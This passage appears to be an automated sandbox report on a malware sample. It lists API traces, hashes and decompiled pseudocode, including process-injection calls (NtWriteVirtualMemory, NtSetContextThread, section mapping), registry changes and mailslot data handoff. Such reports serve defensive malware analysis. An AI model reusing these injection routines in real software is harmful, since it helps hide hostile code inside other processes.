  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 58680

General

Root Process Name:d3d8sext.exe
Process MD5:13FFE10E12298A4E8DC1EE7A0B003B93
Total matches:141
Initial Analysis Report:Open
Initial sample Analysis ID:58680
Initial sample SHA 256:75D846C690C188A3CC6A2E226FDD42AF8A1351B07FB56795106285178B0A0AA7
Initial sample name:sample.exe

Similar Executed Functions

Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32E04, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 251 Total matches: 146registrystringmemory
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
